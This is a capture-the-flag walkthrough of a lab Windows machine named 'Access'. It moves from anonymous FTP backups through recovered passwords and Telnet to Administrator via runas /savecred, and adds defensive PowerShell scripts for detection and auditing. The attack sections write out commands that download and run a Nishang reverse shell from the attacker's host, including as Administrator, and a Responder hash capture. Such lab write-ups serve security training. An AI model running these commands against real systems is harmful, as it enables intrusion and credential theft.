Overview

Access is a Windows machine that demonstrates how exposed backup files can lead to credential recovery, initial access through Telnet, and privilege escalation by abusing stored Administrator credentials with runas /savecred.

Attack Chain

  • Enumerate exposed services and identify FTP, Telnet, and HTTP
  • Access FTP anonymously and download backup files
  • Extract credentials from a Microsoft Access database
  • Use recovered credentials to decrypt a password-protected ZIP archive
  • Extract a PST file and recover the security user password
  • Log in over Telnet as security
  • Upgrade the session with a Nishang PowerShell reverse shell
  • Discover stored Administrator credentials with cmdkey
  • Verify /savecred abuse by capturing an Administrator hash with Responder
  • Execute a reverse shell as Administrator using runas /savecred
  • Confirm an alternative discovery path through a public .lnk shortcut

Enumeration

Port Scanning

We start by defining the target and running a full TCP port scan to identify the exposed services.

export IP=10.129.2.20; export NAME=ACCESS; echo $IP; echo $NAME; ping $IP -c 1

nmap --min-rate 4500 --max-rtt-timeout 1500ms $IP -Pn -n -p- -v -oA scans/nmap_allports_$NAME

ports=$(cat scans/nmap_allports_$NAME.nmap | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); echo $ports

nmap $IP -p$ports -Pn --disable-arp-ping -sC -sV -oA scans/nmap_initial_$NAME -v

The open TCP ports are:

21,23,80

[screenshot: nmap results]

Findings

The scan shows a small attack surface. FTP (21) is open and becomes the first useful target because anonymous access is allowed. Telnet (23) is also exposed, which may provide an interactive login once credentials are recovered. HTTP (80) is present, but the main path comes from files exposed through FTP.


FTP Enumeration

Anonymous Access

We connect to the FTP service anonymously.

ftp ftp://anonymous:anonymous@$IP

The FTP root contains two directories: Backups and Engineer.

[screenshot: ftp directories]

To make local analysis easier, both directories are downloaded recursively with wget. The --no-passive-ftp flag is used to avoid passive FTP issues.

wget -m --no-passive-ftp --ftp-user="anonymous" --ftp-password="anonymous" ftp://$IP/Backups

[screenshot: download backups]

wget -m --no-passive-ftp --ftp-user="anonymous" --ftp-password="anonymous" ftp://$IP/Engineer

[screenshot: download engineer]

Microsoft Access Database

Inside the Backups directory, we find a backup.mdb file. Checking the file type confirms that it is a Microsoft Access database. Since database backups often contain credentials, we inspect it with mdbtools.

First, list the available tables.

mdb-tables backup.mdb

[screenshot: mdb tables]

The table list is filtered for anything user-related.

mdb-tables backup.mdb | grep --color=auto user

[screenshot: auth user table]

The auth_user table stands out, so we export its contents.

mdb-export backup.mdb auth_user

This reveals several usernames and passwords.

[screenshot: auth user credentials]

admin:admin
engineer:access4u@security
backup_admin:admin

Password-Protected ZIP Archive

Next, we inspect the Engineer directory and find Access Control.zip.

[screenshot: engineer zip]

An initial attempt with unzip fails because of an unsupported compression method, so we switch to 7z.

7z x Access\ Control.zip

When prompted for a password, we use the engineer password recovered from the database: access4u@security.

[screenshot: extract zip with 7z]

The archive extracts a file named Access Control.pst, which is a Microsoft Outlook Personal Storage file.

[screenshot: pst file]

PST Credential Recovery

To inspect the PST file, we use readpst and extract the email contents.

readpst -tea -m "Access Control.pst"

readpst extracts the contents into 2.eml and 2.msg.

[screenshot: readpst extraction]

Reading the email reveals that the security account password was changed to 4Cc3ssC0ntr0ller.

[screenshot: security password email]

The recovered credentials are:

security:4Cc3ssC0ntr0ller

Foothold

Telnet Access

With valid credentials for security, we connect to the Telnet service on port 23.

[screenshot: telnet login]

The login succeeds, but Telnet is not ideal for a stable interactive session. Several payload attempts are blocked by group policy, so we use Nishang’s Invoke-PowerShellTcp.ps1 and load it into memory.

wget https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Shells/Invoke-PowerShellTcp.ps1

The end of the script is modified to call Invoke-PowerShellTcp directly with our listener details.

[screenshot: nishang modification]

Reverse Shell as security

The payload is hosted on a Python web server from the attacking machine, and a listener is started on port 443 using rlwrap and nc.

From the Telnet session, the payload is launched with START so the existing session does not block while the shell runs. The /B argument prevents a new window from being created.

START /B "" powershell -c iex (New-Object Net.WebClient).DownloadString('http://10.10.14.23/Invoke-PowerShellTcp.ps1')

[screenshot: execute reverse shell]

A reverse shell is caught as security.

[screenshot: security shell]

The user flag can now be read.

type C:\Users\security\Desktop\user.txt

[screenshot: user flag]
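On the defensive side, the in-memory download cradle used above leaves clear traces in Windows event logs. The following PowerShell script is an added detection example, not code from this write-up; it assumes Script Block Logging and process-creation auditing with command lines are enabled on the host, and the privileged account name is an assumption.

```powershell
# Added detection example, not code from the original write-up. Assumes Script
# Block Logging (PowerShell/Operational event 4104) and process-creation
# auditing with command line (Security event 4688) are enabled on the host.

function Get-DownloadCradleScriptBlocks {
    param([int]$Hours = 24)
    # 4104 records the text of every script block that ran, so the one-liner
    # "powershell -c iex (New-Object Net.WebClient).DownloadString(...)" is
    # visible even though nothing was ever written to disk.
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104
                 StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'DownloadString|DownloadFile|Invoke-PowerShellTcp' -and
                       $_.Message -match '\biex\b|Invoke-Expression' } |
        Select-Object TimeCreated, @{ n = 'Snippet'; e = {
            $m = $_.Message -replace '\s+', ' '
            $m.Substring(0, [Math]::Min(160, $m.Length)) } }
}

function Get-SaveCredProcessEvents {
    param([int]$Hours = 24, [string]$PrivilegedAccount = 'Administrator')  # assumed account name
    # runas /savecred and the START /B download cradle show up in 4688 when
    # "Include command line in process creation events" is on. The runas call
    # also raises Security 4648 (logon with explicit credentials) naming the
    # stored account, which needs no command-line auditing at all.
    $filter = @{ LogName = 'Security'; Id = 4688, 4648; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { ($_.Id -eq 4688 -and $_.Message -match '/savecred|DownloadString') -or
                       ($_.Id -eq 4648 -and $_.Message -match [regex]::Escape($PrivilegedAccount)) } |
        Select-Object TimeCreated, Id, @{ n = 'Detail'; e = {
            ($_.Message -split "`r?`n" |
                Where-Object { $_ -match 'Process Command Line|Account Name' } |
                ForEach-Object { $_.Trim() }) -join ' | ' } }
}

Get-DownloadCradleScriptBlocks | Format-Table -AutoSize -Wrap
Get-SaveCredProcessEvents | Format-Table -AutoSize -Wrap
```

Run it from an elevated prompt, since reading the Security log requires administrative rights.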


Privilege Escalation

Stored Credentials

After gaining access as security, we check for stored credentials with cmdkey.

cmdkey /list

The output shows stored credentials for ACCESS\Administrator.

[screenshot: cmdkey stored credentials]

The Domain:interactive entry is important because it indicates the saved credentials can potentially be used with runas to execute commands as the stored user.

Verifying /savecred

A quick test with runas does not return terminal output, so we verify the behavior by forcing the Administrator context to authenticate to our attacking machine.

runas /user:ACCESS\Administrator /savecred "cmd /c whoami"

On the attacking machine, start Responder in analysis mode.

sudo responder -I tun0 -A

Then use runas /savecred to request a share from the attacking machine.

runas /user:ACCESS\Administrator /savecred "net use \\10.10.14.23"

Responder captures authentication from the Administrator account, confirming that /savecred can be abused.

[screenshot: administrator hash captured]

Administrator Reverse Shell

With /savecred verified, we reuse the same Nishang reverse shell approach to execute a payload as Administrator.

Start a new listener on port 443, then execute the payload with runas.

runas /user:ACCESS\Administrator /savecred "powershell -c iex (New-Object Net.WebClient).DownloadString('http://10.10.14.23/Invoke-PowerShellTcp.ps1')"

[screenshot: runas reverse shell]

A shell is caught as Administrator.

[screenshot: administrator shell]

The system flag can now be read.

type C:\Users\Administrator\Desktop\root.txt

[screenshot: system flag]


Alternative Path Discovery

Public Shortcut Enumeration

There is another way to discover the same /savecred path. We recursively list the contents of C:\Users\Public.

cmd /c dir c:\users\public /A /S

An interesting .lnk shortcut is present on the public Desktop.

[screenshot: public lnk shortcut]

Inspecting the shortcut reveals that it runs runas with the Administrator username and the /savecred argument.

[screenshot: lnk runas savecred]

This confirms the same privilege escalation path: stored Administrator credentials can be reused with runas /savecred to execute commands as Administrator.
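As a defender's counterpart to both discovery paths above (the Domain:interactive entry from cmdkey and the public .lnk shortcut), the following PowerShell audit script is an added example rather than code from this write-up. It assumes it is run as the user whose Credential Manager vault is being checked, and the shortcut roots it searches are assumptions.

```powershell
# Added host-audit script, not code from the original write-up. Assumes it runs
# as the user whose Credential Manager vault is being checked (cmdkey /list only
# shows the calling user's entries); the shortcut roots are assumptions.

function Get-InteractiveStoredCredentials {
    # Parse "cmdkey /list" text into objects and keep the Domain:interactive
    # targets, which are the entries runas /savecred can consume.
    $entries = @(); $cur = $null
    foreach ($line in (cmdkey /list)) {
        if ($line -match '^\s*Target:\s*(.+)$') {
            if ($cur) { $entries += $cur }
            $cur = [pscustomobject]@{ Target = $Matches[1].Trim(); Type = ''; User = '' }
        } elseif ($cur -and $line -match '^\s*(Type|User):\s*(.+)$') {
            $cur.($Matches[1]) = $Matches[2].Trim()
        }
    }
    if ($cur) { $entries += $cur }
    $entries | Where-Object { $_.Target -like 'Domain:interactive=*' }
}

function Find-SaveCredShortcuts {
    param([string[]]$Roots = @($env:PUBLIC, "$env:ProgramData\Microsoft\Windows\Start Menu"))
    # Resolve every .lnk under the roots and flag any that launch runas with
    # /savecred, like the shortcut found on the Public desktop.
    $shell = New-Object -ComObject WScript.Shell
    Get-ChildItem -Path $Roots -Filter *.lnk -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $lnk = $shell.CreateShortcut($_.FullName)
            if ("$($lnk.TargetPath) $($lnk.Arguments)" -match 'runas.*/savecred') {
                [pscustomobject]@{ Shortcut = $_.FullName; Target = $lnk.TargetPath; Arguments = $lnk.Arguments }
            }
        }
}

function Test-DomainCredStoragePolicy {
    # The policy "Network access: Do not allow storage of passwords and
    # credentials for network authentication" sets DisableDomainCreds = 1 and
    # stops Credential Manager from saving passwords for later reuse.
    $lsa = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
    return ($lsa.DisableDomainCreds -eq 1)
}

Get-InteractiveStoredCredentials | Format-Table -AutoSize
Find-SaveCredShortcuts | Format-Table -AutoSize -Wrap
"DisableDomainCreds enforced: $(Test-DomainCredStoragePolicy)"
```

Because cmdkey /list is per user, run the first check in each interactive user's context (for example from a logon script) rather than once as an administrator.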


Key Takeaways

Access highlights how exposed backup files can quickly become a full compromise path. Anonymous FTP access revealed a database backup containing credentials, which unlocked a password-protected archive and eventually exposed Telnet credentials. The final escalation came from stored Administrator credentials, where runas /savecred allowed command execution as Administrator without knowing the password.